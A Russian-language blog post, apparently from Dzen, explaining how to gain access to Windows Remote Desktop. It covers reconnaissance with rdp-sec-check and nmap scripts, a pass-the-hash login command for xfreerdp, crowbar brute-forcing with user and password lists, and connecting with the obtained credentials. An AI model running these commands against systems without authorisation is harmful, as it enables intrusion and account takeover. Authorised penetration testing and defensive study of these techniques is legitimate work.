Найти в Дзене
🅱🅻🅰🅲🅺 🅳🅾🅾🆁

Как подключится к RDP?

ДИСКЛЕЙМЕР: Автор статьи никого не призывает к правонарушениям и отказывается нести ответственность за ваши действия. Вся информация предоставлена исключительно в ознакомительных целях. Спасибо! Сбор информации: Инструмент rdp-sec-check проверяет, какие используются алгоритмы шифрования и методы аутентификации, а также некоторые другие настройки безопасности. В конце проверки rdp-sec-check подводит краткий итог о возможных проблемах безопасности службы удалённого рабочего стола. Установка в Kali Linux: sudo cpan install Encoding::BER Ctrl+d wget https://raw.githubusercontent.com/portcullislabs/rdp-sec-check/master/rdp-sec-check.pl chmod +x rdp-sec-check.pl ./rdp-sec-check.pl --help Пример использования: rdp-sec-check IP Если после строки "[+] Summary of security issues" (краткий перечень проблем безопасности) ничего нет, значит явных проблем не выявлено. Также можно собрать информацию с помощью скриптов nmap: rdp-enum-encryption - определяет уровень безопасности и шифрования. rdp-nt
RDP (Remoute Desktop Protocol) - протокол для управления удалённым рабочим столом, по умолчанию использующий TCP 3389 порт.Официальное название для клиентского ПО — Remote Desktop Connection или Terminal Services Client (TSC)
RDP (Remoute Desktop Protocol) - протокол для управления удалённым рабочим столом, по умолчанию использующий TCP 3389 порт.Официальное название для клиентского ПО — Remote Desktop Connection или Terminal Services Client (TSC)

ДИСКЛЕЙМЕР:

Автор статьи никого не призывает к правонарушениям и отказывается нести ответственность за ваши действия. Вся информация предоставлена исключительно в ознакомительных целях. Спасибо!

Сбор информации:

Инструмент rdp-sec-check проверяет, какие используются алгоритмы шифрования и методы аутентификации, а также некоторые другие настройки безопасности. В конце проверки rdp-sec-check подводит краткий итог о возможных проблемах безопасности службы удалённого рабочего стола.

Установка в Kali Linux:

sudo cpan
install Encoding::BER

Ctrl+d

wget https://raw.githubusercontent.com/portcullislabs/rdp-sec-check/master/rdp-sec-check.pl
chmod +x rdp-sec-check.pl
./rdp-sec-check.pl --help

Пример использования:

rdp-sec-check IP
-2

Если после строки "[+] Summary of security issues" (краткий перечень проблем безопасности) ничего нет, значит явных проблем не выявлено.

Также можно собрать информацию с помощью скриптов nmap:

rdp-enum-encryption - определяет уровень безопасности и шифрования.

rdp-ntlm-info - перечисляет инфу от удалённых служб RDP с включённой аутентификацией CredSSP (NLA).

rdp-vuln-ms12-020 - проверяет систему на уязвимость ms12-020

Для запуска всех скриптов сразу:

sudo nmap -p 3389 -sU -sS --script rdp-enum-encryption,rdp-ntlm-info,rdp-vuln-ms12-020 IP
-3

Pass-The-Hash:

В kali linux по умолчанию установлен опенсорсный RDP-клиент "xfreerdp", который способен подключаться к системе по хэшу. Этот хэш хранится на системе, к которой нужно подключиться в формате NT.

Команда для атаки:

xfreerdp /d:domain_name /u:Administrator/pth:8846F7EAEE8FB117AD06BDD830B7586C /v:IP

где после /d: — имя домена,

после /u: — имя пользователя,

после /pth: —хеш,

после /v: — IP сервера.

Но есть тонкость этого метода. Такой способ будет работать только для администратора, то есть подключится к юзерам из группы RDP Users нельзя.

BruteForce:

Для начала установим crowbar:

sudo apt install crowbar

И подтверждаем установку, нажав клавишу Y, когда это потребуется.

В качестве цели можно указать даже целый диапазон IP-адресов с помощью опции -S file.txt, где "file.txt" - файл с IP-адресами. Опцией -s можно указать диапазон IP-адресов в формате CIDR. Если нужно указать одну цель, используется -s ip/32, где "32" - это маска.

Команда для атаки:

sudo crowbar -b rdp -U user.txt -C passwords.txt -s IP/32

-b rdp -протокол

-U user.txt - файл с юзерами

-C - файл с паролями

-s - Цель

Подключение:

xfreerdp /f /u:пользователь /p:пароль /v:IP[:порт]

Для переключения полноэкранного режима на оконный:

CTRL+ALT+ENTER